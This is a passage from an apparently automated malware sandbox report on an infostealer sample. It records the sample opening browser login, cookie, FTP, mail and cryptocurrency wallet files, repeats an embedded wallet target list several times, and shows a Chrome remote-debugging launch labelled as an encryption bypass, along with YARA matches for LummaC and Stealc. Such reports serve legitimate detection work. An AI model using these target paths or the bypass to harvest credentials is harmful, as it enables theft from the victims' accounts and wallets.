Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16nes\AppData\Roaming\Coinomi\Coinomi\wallets\.
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 232a1df2aa.exe, 0000000E.00000002.3209276748.0000000001953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: Yara match	File source: 0000000E.00000002.3193860810.0000000000C4C000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 232a1df2aa.exe PID: 3300, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 855be7cecf.exe PID: 2908, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

